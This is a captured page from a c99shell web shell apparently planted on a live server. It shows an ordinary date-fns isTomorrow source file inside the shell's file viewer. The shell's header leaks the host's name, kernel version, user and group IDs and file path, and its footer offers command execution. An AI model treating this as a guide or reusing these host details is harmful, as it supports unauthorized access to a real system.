Software: Apache. PHP/8.1.30 uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root) Safe-mode: OFF (not secure) /home/picotech/domains/rentals.picotech.app/public_html/node_modules/date-fns/isTomorrow/ drwxr-xr-x |
Viewing file: Select action/file-type: "use strict"; var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault").default; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = isTomorrow; var _index = _interopRequireDefault(require("../addDays/index.js")); var _index2 = _interopRequireDefault(require("../isSameDay/index.js")); var _index3 = _interopRequireDefault(require("../_lib/requiredArgs/index.js")); /** * @name isTomorrow * @category Day Helpers * @summary Is the given date tomorrow? * @pure false * * @description * Is the given date tomorrow? * * > ⚠️ Please note that this function is not present in the FP submodule as * > it uses `Date.now()` internally hence impure and can't be safely curried. * * @param {Date|Number} date - the date to check * @returns {Boolean} the date is tomorrow * @throws {TypeError} 1 argument required * * @example * // If today is 6 October 2014, is 7 October 14:00:00 tomorrow? * const result = isTomorrow(new Date(2014, 9, 7, 14, 0)) * //=> true */ function isTomorrow(dirtyDate) { (0, _index3.default)(1, arguments); return (0, _index2.default)(dirtyDate, (0, _index.default)(Date.now(), 1)); } module.exports = exports.default; |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]-- |